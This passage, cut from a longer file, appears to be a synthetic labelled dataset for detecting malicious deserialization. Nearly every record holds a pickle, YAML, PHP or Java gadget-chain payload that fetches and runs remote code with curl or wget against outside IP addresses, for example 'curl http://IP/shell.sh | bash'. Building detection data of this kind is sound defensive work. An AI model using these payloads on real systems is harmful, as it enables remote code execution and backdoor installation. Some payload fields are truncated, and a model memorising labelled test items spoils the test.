base64.b64decode('GsNNVe2wRL0HJgBQS+AHIYrobtbvXQQXG+g93CgRneIPg6mTezIykqUijopf')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00547", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:56:\"Gs7pKS4YZjU1+ij4XJh7zVCESi0zMSUlrxbTWuuI\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://89.172.176.60/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:56:\"Gs7pKS4YZjU1+ij4XJh7zVCESi0zMSUlrxbTWuuI\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://89.172.176.60/bd\")"}}]} {"id": "synth_malicious_deserialization_00548", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:42:\"YascP0s+8rSFxfbSquz6pAkyTI6qAmmh+zM8DmwM\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://3.4.238.111/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:42:\"YascP0s+8rSFxfbSquz6pAkyTI6qAmmh+zM8DmwM\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://3.4.238.111/bd\")"}}]} {"id": "synth_malicious_deserialization_00549", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('OCORY/MyuVnoK3+PiiHEJ01gx5wyAV7lgfOqEqZrPC+Dn7T2Ca9J3pg99m13')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://50.193.126.88/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('OCORY/MyuVnoK3+PiiHEJ01gx5wyAV7lgfOqEqZrPC+Dn7T2Ca9J3pg99m13')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00550", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://109.133.198.110/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://182.68.38.178/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://109.133.198.110/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://182.68.38.178/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00551", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:40:\"M+hjERsmTA8Ma0iFL6VT3J3g/EbTBREHdTGXaGlk\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://230.77.2.130/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:40:\"M+hjERsmTA8Ma0iFL6VT3J3g/EbTBREHdTGXaGlk\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://230.77.2.130/bd\")"}}]} {"id": "synth_malicious_deserialization_00552", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://169.31.81.143/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://169.31.81.143/shell\")"}}]} {"id": "synth_malicious_deserialization_00553", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://215.148.39.223/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://215.148.39.223/shell\")"}}]} {"id": "synth_malicious_deserialization_00554", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://115.1.138.131/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://115.1.138.131/shell\")"}}]} {"id": "synth_malicious_deserialization_00555", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://32.158.207.162/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://184.121.235.175/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://32.158.207.162/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://184.121.235.175/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00556", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://189.90.217.94/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://236.82.253.245/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://189.90.217.94/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://236.82.253.245/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00557", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://109.194.207.75/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://92.255.96.19/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://109.194.207.75/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://92.255.96.19/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00558", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:78:\"M1HDVKKvvV7MUAujqqcvsDAH06DybsdtQtTTQ8Bh\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://135.68.53.156/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:78:\"M1HDVKKvvV7MUAujqqcvsDAH06DybsdtQtTTQ8Bh\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://135.68.53.156/bd\")"}}]} {"id": "synth_malicious_deserialization_00559", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://240.244.79.238/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://240.244.79.238/shell\")"}}]} {"id": "synth_malicious_deserialization_00560", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://96.208.82.181/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://179.90.18.172/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://96.208.82.181/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://179.90.18.172/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00561", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:20:\"aJj+j8lGOr3dOwdSNkNGJjlSFORLNP7CkRTuvT8j\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://176.83.177.234/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:20:\"aJj+j8lGOr3dOwdSNkNGJjlSFORLNP7CkRTuvT8j\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://176.83.177.234/bd\")"}}]} {"id": "synth_malicious_deserialization_00562", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://71.170.172.157/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://249.223.238.229/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://71.170.172.157/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://249.223.238.229/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00563", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://20.17.49.61/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://20.17.49.61/shell\")"}}]} {"id": "synth_malicious_deserialization_00564", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://162.152.166.106/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://177.21.116.138/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://162.152.166.106/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://177.21.116.138/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00565", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:64:\"PDqPTgDT9XTNgVeQogQYj2eJBE5qywmaSDIk/nOP\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://106.214.37.147/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:64:\"PDqPTgDT9XTNgVeQogQYj2eJBE5qywmaSDIk/nOP\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://106.214.37.147/bd\")"}}]} {"id": "synth_malicious_deserialization_00566", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://66.41.187.231/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://155.95.111.206/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://66.41.187.231/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://155.95.111.206/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00567", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://111.237.114.211/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://111.237.114.211/shell\")"}}]} {"id": "synth_malicious_deserialization_00568", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://50.57.211.232/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://22.121.96.14/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://50.57.211.232/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://22.121.96.14/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00569", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://140.30.206.128/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://140.30.206.128/shell\")"}}]} {"id": "synth_malicious_deserialization_00570", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://199.81.246.36/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://199.81.246.36/shell\")"}}]} {"id": "synth_malicious_deserialization_00571", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:49:\"+gYmSc7oKfQT+1QzgwrGlJfgPy8blIE4LMN+YFBg\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://232.151.49.22/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:49:\"+gYmSc7oKfQT+1QzgwrGlJfgPy8blIE4LMN+YFBg\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://232.151.49.22/bd\")"}}]} {"id": "synth_malicious_deserialization_00572", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:58:\"NWwpi1KWQc6qSJOPccMnzB5wGNGIXWS/7UH6vhsD\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://42.84.232.101/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:58:\"NWwpi1KWQc6qSJOPccMnzB5wGNGIXWS/7UH6vhsD\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://42.84.232.101/bd\")"}}]} {"id": "synth_malicious_deserialization_00573", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://155.184.130.119/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://155.184.130.119/shell\")"}}]} {"id": "synth_malicious_deserialization_00574", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('IoacSIGQy/rJOM1jPb+0siTWf0AdSxPWHOCfD2xFm6PaTVQq3RzSAYJK2zJP')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://130.191.2.191/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('IoacSIGQy/rJOM1jPb+0siTWf0AdSxPWHOCfD2xFm6PaTVQq3RzSAYJK2zJP')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00575", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://92.61.210.112/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://198.77.253.22/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://92.61.210.112/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://198.77.253.22/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00576", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('RCMeAMMYQ+c6MSrXi3K0TgTMfWVt21H9CIniMRMDTww8StGxDlFrZNh9HMoq')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://3.125.152.125/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('RCMeAMMYQ+c6MSrXi3K0TgTMfWVt21H9CIniMRMDTww8StGxDlFrZNh9HMoq')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00577", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://158.43.35.12/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://208.30.22.95/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://158.43.35.12/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://208.30.22.95/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00578", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://248.190.177.110/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://248.190.177.110/shell\")"}}]} {"id": "synth_malicious_deserialization_00579", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://55.139.10.89/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://55.139.10.89/shell\")"}}]} {"id": "synth_malicious_deserialization_00580", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://116.117.172.159/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://126.148.43.222/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://116.117.172.159/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://126.148.43.222/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00581", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:43:\"3tag0/yAVs79ti6/DuLeuJ5mSlNBinrw19/FISIt\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://34.119.252.52/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:43:\"3tag0/yAVs79ti6/DuLeuJ5mSlNBinrw19/FISIt\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://34.119.252.52/bd\")"}}]} {"id": "synth_malicious_deserialization_00582", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://23.100.206.213/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://23.100.206.213/shell\")"}}]} {"id": "synth_malicious_deserialization_00583", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:34:\"JE5zSD2R4ft4SdfkbRqftrx7m+bozNnR2gxrldE7\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://206.44.34.254/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:34:\"JE5zSD2R4ft4SdfkbRqftrx7m+bozNnR2gxrldE7\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://206.44.34.254/bd\")"}}]} {"id": "synth_malicious_deserialization_00584", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://113.237.8.134/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://113.237.8.134/shell\")"}}]} {"id": "synth_malicious_deserialization_00585", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('n0frRjt5bwPzFtj0jmqBo5uBmmY/Sbyvcn6t9UZyiSjrlLQnkIKp+89Xy7xu')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://230.222.83.167/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('n0frRjt5bwPzFtj0jmqBo5uBmmY/Sbyvcn6t9UZyiSjrlLQnkIKp+89Xy7xu')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00586", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://26.115.231.234/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://26.115.231.234/shell\")"}}]} {"id": "synth_malicious_deserialization_00587", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:29:\"CUQ0JkajyA0yePe940A6RH3/oQ+fgmMPZ0ITBea3\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://118.34.239.207/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:29:\"CUQ0JkajyA0yePe940A6RH3/oQ+fgmMPZ0ITBea3\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://118.34.239.207/bd\")"}}]} {"id": "synth_malicious_deserialization_00588", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('gGPCViDk0TfwDRqnNkwWOX/KDLq9lgx387kwHfMBik9stIWNn7pFBW1ywDNM')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://33.24.94.253/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('gGPCViDk0TfwDRqnNkwWOX/KDLq9lgx387kwHfMBik9stIWNn7pFBW1ywDNM')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00589", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://153.149.29.135/payload | 